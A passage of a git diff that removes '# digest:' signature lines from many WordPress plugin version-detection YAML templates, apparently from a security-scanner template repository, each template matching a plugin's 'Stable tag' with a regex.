490a0046304402204462e6c7fbf724b0a5bae781f7f2159d427ef5465b70ef230cfbded8a620bb8d0220065698df7713361de9aa3aff78d4232a1a02ebe25f203f84a5d2dc9416921716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index b644dc72c6..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022068e1f84be31999f28f783e6cac3f948f22b32ce8e39284c59b78efb46d7950790220030ba4c483e72c97ce4db1837f2c9cafaad1c75ffcced189a76455323296e0e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 43e0145b7a..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100953fdc647f76708439a94d8c88e2707510c8fcc033a997c79c8eabe1c85c21780220540d1250df41bcd8842c2e0d00dacb4f3b03af76a5ef300bc7d16701b8a07501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 3c4c673d6e..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100adec33f7eb0b439615ac6dcd11305d38a2699ecd889f6b21dcd02ee6090cb78e02203b1dabf3f291fb5386cff2f279003fd4cf94d5d8329507af8dadf577675f28f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index d47d669a4b..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009351caae4757095fc9306aa8f65443b417e2bb6e4cf21432d87597ffffb97e8802201ef4aaae6c05863f89f9a9f945407f0dcef9efafacaeff7fa0a57274a7be4c42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 1830095eff..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f3d99c1914c8b6958c8f8023b8cc3fb51b5d1090bbd1d13b9ee0620b765850a202200395cf514cb100ba65f4f95f586d66a3fc4ef2af77e8f36c24747039171b8b18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 364d436fbd..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022044e324c93ed25f15febca824e87ba8547d225b54c564dd23710a6c7489d1698402203aa5ac8880367d158e57977cf39f4877c86dfe3f6fc7c1f144cd7a5aee31cde0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 544f5df98c..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052b09655a5d523247b7d552a5d6ec02d41955ed8411bec2ee53f7bd44d1c959d022045ae3c841c2c4602024a719351aa730054ac628ebd9b5bf623ccd9ef1b27a590:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index ccda139d66..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c4309e7d1683ada0e2f7b36500028e0755f4059714a8d69dc89f6f7bf65509302205f0f94eaec5fc5accca197e4b9126d388dd6afdc1735aa4718e37db35d23eff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 591bccceb6..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad157c3dc7854cf0fc622851921b39e1f65821ce62890423f6e4bbf772477db70220163de00d088d74fbdb99ab08f50ce1c51500664f36612759e56c90fdff5be1fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 890476657d..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8c2142d713469aa2b756dbe34d5b6c5a667a7e3d91f8de14b7e1a47ee6eb87902205be97175e49659bfffe189f2a6e2fe4c42856d874ffdc3f8c778786eb1fef4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 3b91c94544..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f7ca4f86c1cd564a2f17c3e488f20b5d1e804c795e3ef829b023534d8e0cb0f8022100becc283d19e464f0c7a08d50d60d80862660d2a50b159302c2cfb66056e164ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 760e492735..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100913f041ce4d25161b63c6eb9e087b38f79dca4934e760ac1251f120a007981f5022100a992f3c5ae98013f010044eec7e2cf80ef715fc8722992b7df059131d2f77693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 134ad64347..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100efcc2d80a463e42db3cec3a7b0ec02562d984009a2fa8863feb54c70a3814b45022032c8c8552b06b11a9ae602c257e6939cd7927c5beb1252b517ea66eb7352e22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index cd3c2debbe..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210096a1b9df97dcbc074eccc12a4e2922e5fe4ca2204bceefce2962daec2c120fa10221008ba8ea9c9f4ee4716db1c5fda2dd644d5a71cc9c0f8a9a1e2cb0fc0873cb3958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 28a27542cd..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d01a8846768169b032baa5816615164fbf8a509a2ad99fbab4acde9550ac83bb02210080319cf46288f15de90ce5e72556c224d0f6f56a66e935a4ad0ac6eeb48a0e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2fb1cbad32..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090ceaf341a75aa4aa666507ccbe1788f542fc596f9fd8adab88f9db821eb2d55022100a87e6aff64932bf9e86c2bfd33a55a49888f19fe037f46148ebe64ccb312a217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6099d78ae4..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bc97b984bf0f0170b96341265017519f7dc78019cbd162cef3be5bb989827112022076f9b1af922298f2e2b787aea00cebcd67ab19a0f5647e3f656e67f6faadfec1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 6dbd4ad3f4..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b94bb6931d74123cd6291011d17df62d7286ddbe5501fee3a03c6bc18cbe456022100b06999aa0a33540cf0713390096ea18be2937a19734ce5bc04660b073e251e9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 732747398e..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022032da01c5f0d51eb8414b08dfb0d285ca1ad7fe403e38e75f178d19216fe1c2f402202769f9f214a574abfc7e4b3bc4798d7b5000c0b600d863002e9520507b956f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index c0fb7dec47..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220780ce95c8359b53a81c36cdf3824f58447f2ca401bf6d271e254fe2ffabf614402203be1f78fd2b551101261c568e8b1022287f02db51505b90477d57e71e451ed21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a092ea45c8..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100daaa364f050a0fca3297048e1d6d2607ffa364871ad34a1aa975a86a16919715022100d6d99fac5da9490a61e34db6c41b28429451172f218a6ce56a25d03e8bb2d9bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 7a73c04892..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100877910f69299e0f8c61a186333e1b8122b9cb080db1442d0907e908a7681906c0220233562fb0a1dd56f6c42014d5b38d29b944c0420422ce404a14730bad1dda8f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index ff37b82473..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220607473f7e11bb477715162496e12df71eb3b31b2482106bb76b0890c533f65f40220569552e1f3b0a092d6fc881e329e87729eb603476d2f0ec7ca520361e9065b1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index a06561234e..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e1f64aeb6e089d0af7ff56201c0a14c04e6364e64c48be12481158b690deb81c02202ad1148e828730fd6e9a9411498dd077af0b5391d193434426624995a8905a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 08e12dc7fc..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010f87cecf17e6321a687a551ec05422dee0b0ba5bbc78edd60d49c66cc46430b0221009a37b5258c707ce4e529cd12fc87bf8982f6e158a39fc156b9a23715fbfc0c30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 134d3e48b8..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a463a46e78f394a3160871f5881546aee8b26c7dad24d8605a10f367e3ba772d022075ab4beb11aa7c9ed5af397f4d6c0cbc6d9d5c710903a4b07bee7f120218443c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 8a46285762..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008d6f9a135688f4bb5b836a20af9d01275a63baa831db81d63f5c1fae01015e17022100efbaa1c9963dd8d39ba48e43c6680811472e87fadad7fe01d74201539d16a659:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index e2fc0ca257..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e4471f6ad605a62d1b989fee4a3af185349fec7f50f00ff6356772aa8707c5c022100b223b33d5f0e2db32aea27a4b0162c66cf920184a2361b57854b925c46146b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index afdfc90ee0..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b08c43453df562930ea56c3adb15cd6eab72371f10c7d1de06d127071c3d224022100f0e91430c3b2e6fb13018734fa2a11fb28444ce8b3d77fa527d774614cca9d76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 26120882b9..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100883d4ea915b26f00f21e6046958c2981eb2b36776df23be9b7df16fea63ee03f022100bd8671a42b0b2a7a703a0f14437aa90bf389ec63f2c0099ad14e06fd1ddd8b84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 07e39060e5..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022004eeeb75b025a52e1b6c0d86c5a8320022b99557130210ae7c5a2f09705d20cb022100b0a51666886a627bcf9a8880308c7ecf19a343b3ebbc97c065ff89cf0483070f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 055991bd1c..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be6844b8ddaa9001370dd18d1f6e3cfde5d0be9d8226d5dd33fdd683fcfcde2c022100a1803bb5ba476c16e4d34d1a7a5f875b374937a1b58190e4656865a9304482dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 51623069e7..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100916a17271f993f937ad28ef57ab5d029fae29a5e45c755f08fe54805250f13df02205c726e9fc20cb95b74be915109bcbd8ca966dc5e7255184c45b0d87dfdb89845:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 8e38a1612f..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ab52e8645660b894e37142f6cd2084ecca6b8716a07cbc823c572491dbf8f69022100d60f41074c4ada6868029945a38b21d84a2b1f40e6f1541c632e00ddf8d9ffcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 89c0401c39..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aeb1cef9e6380efa25562a39067e1fd9bea01c0cc18b4afed8e60a64ee44b494022100e8d14b6851e908211f04b40b94ef5af6ade95bb1642c5d69ceabbe49686fb814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 7f135099f0..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b084be1dc8d297c87430ba7548e094f0bd7a5d9231b125e76710e2f02e9de5b022100b6144037190adcaaa0137c0d547d5f59f5aee91ce35e28e70884f78eb7dbb1af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index d3ff937cce..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aac2483ab0c3b1bff24a48e3a64d7a701827a214f964e8900cb0ebd6b5991246022009e80ee1863b4ab9ad5cf66eaf536445a4b83cb1efb63e721c3af4e6e590e532:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 6223e46443..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d27d4b1578825bb4d36ae1432bbfe96cc1237d828e2b51e542d3499f0aa446002205e888727f52035b30117fcc55e0433ebbf829080abbc99d658750f65bf304083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 5191a50ea3..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059b7ed84c06906e3d0e34335a4de3dbc78a8d204719468728e9e5a0ee41a045902202daadd468699f86d0b6684eace876aef66888a0fa0d81f097a403ad255034eab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 15ed058047..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068c39995af70e395929a4a108764b8f47ea64e945cf875dee001c0689577c18e022100afcbd25d3141dba19d1ce69d09477a5a7d4b2d246b6dfc7dc1642db4ba1b3552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index cffae16488..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e756458f21c1134738025c54bb36ff75e11da5a1dd28d1f72ab2f5c78cd1819302200b4bb6c874c13dd95fe3d84a5e863096935c5fc3e2565062cbacc102c4a5665e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 83d86646a5..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010cc17bdac27b911a47fc3afca9202e19b94f93a6fc7db3c2124ba93de268203022100cb610e5a998b31d4a6ca6234f71a275a8060bc85276c476f75a51397a015c765:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 93f3e988b6..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c394d07f8b52b9b4d387d9ac34d4c2ddcd358b8014194ba1ea6814bd35d6acaf022100ad72f3107c32ef502e5afb6106b94078355b2a198e7bb9874346dfc01380cd17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index e11ae6207a..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202db6da8d0fbabc08bc3b77759455e1558163e4a46940153967385d2ddf09be8502203272da9c81efe661401064a4d4e2538fea24e1512ae7797f22e804779ca32220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b18c463253..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022073bbef5c2130c6a4dcd4beb244a5d4204f2addfb27113addf7f3f598d102b95b022100c5a2f2d7af53a10cbc61543b2c1558725e6c138a9bb1ce0556669571ad3c33c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 084042bf4f..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071cb78ecf4980cc96010ede14934fe7f1a3746e5eee3f603cf74e7ced7e3a659022100c675ff58aac7d4274506df97def448cb38b2af6ac5cf6572944361372d21caa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index ff30cfe730..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ 